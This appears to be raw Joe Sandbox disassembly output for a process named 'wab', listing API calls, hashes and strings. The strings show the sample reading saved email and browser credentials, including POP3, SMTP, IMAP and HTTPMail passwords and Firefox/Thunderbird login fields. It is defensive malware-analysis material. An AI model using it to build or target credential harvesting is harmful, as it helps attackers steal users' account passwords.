                                                                                                                                                                                                            • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                                                                                                                                                                                            • Part of subcall function 0041042B: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402928,?,?,?,?,00402928,?,?), ref: 0041044A
                                                                                                                                                                                                            • Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00402EBC
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00402ECF
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00402F5C
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00402F69
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402FC3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _mbscpy$QueryValue$CloseOpen
                                                                                                                                                                                                          • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                                                                                                                                                          • API String ID: 52435246-1534328989
Uniqueness Score: -1.00%

APIs
• EmptyClipboard.USER32 ref: 00406BA4
  • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
• GetFileSize.KERNEL32(00000000,00000000), ref: 00406BC1
• GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406BD2
• GlobalFix.KERNEL32(00000000), ref: 00406BDF
• ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BF2
• GlobalUnWire.KERNEL32(00000000), ref: 00406C01
• SetClipboardData.USER32(00000001,00000000), ref: 00406C0A
• GetLastError.KERNEL32 ref: 00406C12
• CloseHandle.KERNEL32(?), ref: 00406C1E
• GetLastError.KERNEL32 ref: 00406C29
• CloseClipboard.USER32 ref: 00406C32
Similarity
• API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
• String ID:
• API String ID: 2565263379-0
Uniqueness Score: -1.00%

APIs
• EmptyClipboard.USER32 ref: 00406C45
• strlen.MSVCRT ref: 00406C52
• GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040C0BB,?), ref: 00406C61
• GlobalFix.KERNEL32(00000000), ref: 00406C6E
• memcpy.MSVCRT ref: 00406C77
• GlobalUnWire.KERNEL32(00000000), ref: 00406C80
• SetClipboardData.USER32(00000001,00000000), ref: 00406C89
• CloseClipboard.USER32 ref: 00406C99
Similarity
• API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpystrlen
• String ID:
• API String ID: 2315226746-0
Uniqueness Score: -1.00%

Similarity
• API ID: PrivateProfileString_mbscmpstrlen
• String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
• API String ID: 3963849919-1658304561
Uniqueness Score: -1.00%

Similarity
• API ID: ??2@??3@memcpymemset
• String ID: E$ E$ E
• API String ID: 1865533344-1090515111
Uniqueness Score: -1.00%

APIs
• strlen.MSVCRT ref: 0044269A
• _strncoll.MSVCRT ref: 004426AA
• memcpy.MSVCRT ref: 00442726
• atoi.MSVCRT ref: 00442737
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00442763
Similarity
• API ID: ByteCharMultiWide_strncollatoimemcpystrlen
• String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
• API String ID: 1864335961-3210201812
Uniqueness Score: -1.00%

Similarity
• API ID: strcmp$_strcmpi$memcpystrlenstrtoul
• String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
• API String ID: 1714764973-479759155
Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E6BB
                                                                                                                                                                                                            • Part of subcall function 0040690E: memset.MSVCRT ref: 00406930
                                                                                                                                                                                                            • Part of subcall function 0040690E: strlen.MSVCRT ref: 0040693B
                                                                                                                                                                                                            • Part of subcall function 0040690E: strlen.MSVCRT ref: 00406949
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E70C
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E728
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,%@,000000FF,?,00000104,?,?,?,?,?,?,0040EC25,?,00000000), ref: 0040E73F
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040EC25,?), ref: 0040E75E
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E7C0
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E7D5
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E83A
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E850
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E866
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E87C
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E892
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E8A8
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E8C2
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                                                                                                                          • String ID: $"$$$$$%@$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                                                                                                                          • API String ID: 3137614212-1813914204
                                                                                                                                                                                                          • Opcode ID: 69a064d0c74a5f80a32c9514a74247ccae5cfcd5772a3df6081ef2e910daae95
                                                                                                                                                                                                          • Instruction ID: 60cbd65c12865ccb94f157c96bc1922d811664869268201cbad442dfa9876f55
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69a064d0c74a5f80a32c9514a74247ccae5cfcd5772a3df6081ef2e910daae95
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9228E218087DA9DDB31D6BC9C456CDBF646B16234F0803DAF1E8BB2D2D7344A46CB66
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _strcmpi$strlen$_strncoll$atoimemset$memcpy
                                                                                                                                                                                                          • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$port$server$signon.signonfilename$true$type$useSecAuth$useremail$username
                                                                                                                                                                                                          • API String ID: 594115653-593045482
                                                                                                                                                                                                          • Opcode ID: 02ac693aacd5f103a4b76259fedb339b3b15ca4c55630f2bd5c8a753d7842cac
                                                                                                                                                                                                          • Instruction ID: 1e907043fac54bf2e371806c1eb24ba38ca233ac5dd260cadef0f6990961d541
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 02ac693aacd5f103a4b76259fedb339b3b15ca4c55630f2bd5c8a753d7842cac
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C71D832804204AEFF14ABA1DD02B9E77B5DF91329F21406FF545B21C1EB7D9A18D64C
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040690E: memset.MSVCRT ref: 00406930
                                                                                                                                                                                                            • Part of subcall function 0040690E: strlen.MSVCRT ref: 0040693B
                                                                                                                                                                                                            • Part of subcall function 0040690E: strlen.MSVCRT ref: 00406949
                                                                                                                                                                                                            • Part of subcall function 004086A5: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,0040EC43,?,00000000,?,?,?,?,?,?), ref: 004086C3
                                                                                                                                                                                                            • Part of subcall function 004086A5: CloseHandle.KERNEL32(?,?), ref: 0040870D
                                                                                                                                                                                                            • Part of subcall function 00408763: _mbsicmp.MSVCRT ref: 0040879D
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E123
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E138
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E19F
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E1B5
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E1CB
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E1E1
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E1F7
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E20A
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E225
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E23C
                                                                                                                                                                                                            • Part of subcall function 00406582: memset.MSVCRT ref: 004065A3
                                                                                                                                                                                                            • Part of subcall function 00406582: memcmp.MSVCRT ref: 004065CD
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E29D
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E2B4
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E2CB
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040E2E6
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040E2FB
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040E310
                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040E326
                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040E33F
                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040E358
                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040E374
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                                                                                                          • String ID: C@$encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                                                                          • API String ID: 4171719235-3249434271
                                                                                                                                                                                                          • Opcode ID: b0d5c0670ed8c74d0c8e3b60901706fc2ec35adaa3e3620046f1bbd10783a5e2
                                                                                                                                                                                                          • Instruction ID: 4eb083177fa9c3dcba641838e0e399a852ec85db15ddf69852980c8670b79128
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0d5c0670ed8c74d0c8e3b60901706fc2ec35adaa3e3620046f1bbd10783a5e2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EFA16672D04219AEDF10EBA1DC41ADE77BCAF44304F1044BFF645B7181DA38AA988F59
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0040FDA3
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0040FDAF
                                                                                                                                                                                                          • GetWindowLongA.USER32(00000000,000000F0), ref: 0040FDBE
                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 0040FDCA
                                                                                                                                                                                                          • GetWindowLongA.USER32(00000000,000000EC), ref: 0040FDD3
                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 0040FDDF
                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0040FDF1
                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0040FDFC
                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040FE10
                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040FE1E
                                                                                                                                                                                                          • GetDC.USER32 ref: 0040FE57
                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040FE97
                                                                                                                                                                                                          • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 0040FEA8
                                                                                                                                                                                                          • ReleaseDC.USER32(?,?), ref: 0040FEF5
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040FFB5
                                                                                                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 0040FFC9
                                                                                                                                                                                                          • SetWindowTextA.USER32(?,00000000), ref: 0040FFE7
                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 0041001D
                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0041002D
                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041003B
                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00410052
                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0041005C
                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 004100A2
                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004100AC
                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 004100E4
                                                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
• String ID: %s:$EDIT$STATIC
• API String ID: 1703216249-3046471546
• Opcode ID: 8a60e0ba97f171743a829e93ce0ff1a0e7cc565a63bc43af7584db32dade8b22
• Instruction ID: 60093129ffb9b10d71bc98ba01756b195f92c815bd96d79b3314cc8c80e42073
• Opcode Fuzzy Hash: 8a60e0ba97f171743a829e93ce0ff1a0e7cc565a63bc43af7584db32dade8b22
• Instruction Fuzzy Hash: 62B1DE71108741AFDB20DF68C985E6BBBE9FF88704F00492EF69992261DB75E804CF56
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 004024E7
  • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
• _mbscpy.MSVCRT ref: 00402525
• _mbscpy.MSVCRT ref: 004025EF
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: _mbscpy$QueryValuememset
• String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
• API String ID: 168965057-606283353
• Opcode ID: d04dcaea7970b63fee6828c7dcfe30098fc49b177350675b76886810d8c329c2
• Instruction ID: 01ace8319ffdb9fe87aab8cc910760b0be55d28e69d7af66dfccc1b3ad16f9ad
• Opcode Fuzzy Hash: d04dcaea7970b63fee6828c7dcfe30098fc49b177350675b76886810d8c329c2
• Instruction Fuzzy Hash: 815163B540161CEBEF20DF91DC85ADD7BACAF04318F50846BFA08A6142D7BD9584CF98
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040285B
  • Part of subcall function 00402994: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029C5
• _mbscpy.MSVCRT ref: 00402895
  • Part of subcall function 00402994: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004029F3
• _mbscpy.MSVCRT ref: 0040296D
  • Part of subcall function 0041042B: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402928,?,?,?,?,00402928,?,?), ref: 0041044A
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: QueryValue_mbscpy$ByteCharMultiWidememset
• String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
• API String ID: 1497257669-167382505
• Opcode ID: fb3ed3ae92ef97c750fd38775156bd4655232a824b152189a5320ea8a9642570
• Instruction ID: 24fe9e335227be75b4da69fc4be99485a809f42695e36ab36f90f83f1315ab2f
• Opcode Fuzzy Hash: fb3ed3ae92ef97c750fd38775156bd4655232a824b152189a5320ea8a9642570
• Instruction Fuzzy Hash: 22514DB150060C9BEF25EF61DC85ADD7BA8FF04308F50802BF924661A2DBB99958CF48
Uniqueness
Uniqueness Score: -1.00%

APIs
• EndDialog.USER32(?,?), ref: 0040F600
• GetDlgItem.USER32(?,000003EA), ref: 0040F618
• SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040F637
• SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040F644
• SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040F64D
• memset.MSVCRT ref: 0040F675
• memset.MSVCRT ref: 0040F695
• memset.MSVCRT ref: 0040F6B3
• memset.MSVCRT ref: 0040F6CC
• memset.MSVCRT ref: 0040F6EA
• memset.MSVCRT ref: 0040F703
• GetCurrentProcess.KERNEL32 ref: 0040F70B
• ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040F730
• ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040F766
• memset.MSVCRT ref: 0040F7BD
• GetCurrentProcessId.KERNEL32 ref: 0040F7CB
• memcpy.MSVCRT ref: 0040F7FA
• _mbscpy.MSVCRT ref: 0040F81C
• sprintf.MSVCRT ref: 0040F887
• SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040F8A0
• GetDlgItem.USER32(?,000003EA), ref: 0040F8AA
• SetFocus.USER32(00000000), ref: 0040F8B1
Strings
• Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040F881
• {Unknown}, xrefs: 0040F67A
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
• String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
• API String ID: 1428123949-3474136107
• Opcode ID: b9341adbc2cd016ad37feae7563ea95aa4c33f034ac246c3141dbd5b744c5ef9
• Instruction ID: eaf6f4841f79e9ca67ab0c8a61f7093b44a411cbafad24e33deb6097971d8b5c
• Opcode Fuzzy Hash: b9341adbc2cd016ad37feae7563ea95aa4c33f034ac246c3141dbd5b744c5ef9
• Instruction Fuzzy Hash: 4271B576404344BFEB31ABA0DC41EDB7B9CFB94345F00443AF644A25A1DB399D18CB6A
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32(?,000003EC), ref: 004010BC
• ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
• GetDlgItem.USER32(?,000003EE), ref: 00401103
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
• GetDlgItem.USER32(?,000003EC), ref: 0040113E
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
• LoadCursorA.USER32(00000067), ref: 0040115F
• SetCursor.USER32(00000000,?,?), ref: 00401166
• GetDlgItem.USER32(?,000003EE), ref: 00401186
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
• GetDlgItem.USER32(?,000003EC), ref: 004011AD
• SetBkMode.GDI32(?,00000001), ref: 004011B9
• SetTextColor.GDI32(?,00C00000), ref: 004011C7
• GetSysColorBrush.USER32(0000000F), ref: 004011CF
• GetDlgItem.USER32(?,000003EE), ref: 004011EF
• EndDialog.USER32(?,00000001), ref: 0040121A
• DeleteObject.GDI32(?), ref: 00401226
• GetDlgItem.USER32(?,000003ED), ref: 0040124A
• ShowWindow.USER32(00000000), ref: 00401253
• GetDlgItem.USER32(?,000003EE), ref: 0040125F
• ShowWindow.USER32(00000000), ref: 00401262
• SetDlgItemTextA.USER32(?,000003EE,00451398), ref: 00401273
• memset.MSVCRT ref: 0040128E
• SetWindowTextA.USER32(?,00000000), ref: 004012AA
• SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
• SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
• String ID:
• API String ID: 2998058495-0
• Opcode ID: 0f9c4242ba45eb06dd3dfa1dd6db45fade88f32ef90b46f4d12f3d9a9e08a6d1
• Instruction ID: cf74e5707885198988a29297af0a26d915b41f86d4ff93bb74c60bb1bb3fb963
• Opcode Fuzzy Hash: 0f9c4242ba45eb06dd3dfa1dd6db45fade88f32ef90b46f4d12f3d9a9e08a6d1
• Instruction Fuzzy Hash: 04618B35800208EBDF12AFA0DD85BAE7FA5BB04305F1481B6F904BA2F2C7B59950DF58
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00408DE1: LoadMenuA.USER32(00000000), ref: 00408DE9
                                                                                                                                                                                                            • Part of subcall function 00408DE1: sprintf.MSVCRT ref: 00408E0C
                                                                                                                                                                                                          • SetMenu.USER32(?,00000000), ref: 0040BA7E
                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BAB1
                                                                                                                                                                                                          • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BAC7
                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BB27
                                                                                                                                                                                                          • LoadIconA.USER32(00000066,00000000), ref: 0040BB96
                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040BBEE
                                                                                                                                                                                                          • RegDeleteKeyA.ADVAPI32(80000001,0044551F), ref: 0040BC03
                                                                                                                                                                                                          • SetFocus.USER32(?), ref: 0040BC29
                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(004518C0), ref: 0040BC42
                                                                                                                                                                                                          • GetTempPathA.KERNEL32(00000104,004518C0), ref: 0040BC52
                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040BC59
                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040BC67
                                                                                                                                                                                                          • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BCC3
                                                                                                                                                                                                            • Part of subcall function 00404B82: strlen.MSVCRT ref: 00404B9F
                                                                                                                                                                                                            • Part of subcall function 00404B82: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404BC3
                                                                                                                                                                                                          • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BD0E
                                                                                                                                                                                                          • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BD21
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040BD36
                                                                                                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 0040BD5A
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                                                                                                                                          • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                                                                          • API String ID: 2303586283-933021314
                                                                                                                                                                                                          • Opcode ID: bc2ea265da4b9d7fbf42eb82516b20c9e5d99f5c25abf20ff2f7a7fba55c6b61
                                                                                                                                                                                                          • Instruction ID: a3034197930a53117d85b49231bdaaa03d04473d70278c5121b5a691f959c143
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc2ea265da4b9d7fbf42eb82516b20c9e5d99f5c25abf20ff2f7a7fba55c6b61
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13C1E0B1644788FFEB16DF64CC45BDABBA5FF14304F00016AFA44AB292C7B59904CB99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                                                                                                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                          • API String ID: 633282248-1996832678
                                                                                                                                                                                                          • Opcode ID: d48ae4295fbb277336b7674ab4026529653ef1736987acc8de4e4bffa9c8da66
                                                                                                                                                                                                          • Instruction ID: 7c6bf41bc1280a1bc88d4c6d4cc59bc6a86d5934fc3475aca932ea250c86fdc0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d48ae4295fbb277336b7674ab4026529653ef1736987acc8de4e4bffa9c8da66
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E31E7B2805324BEFB14EA54DD42EDEB76CAF11354F20415FF214A2182DBBC9ED48A9D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
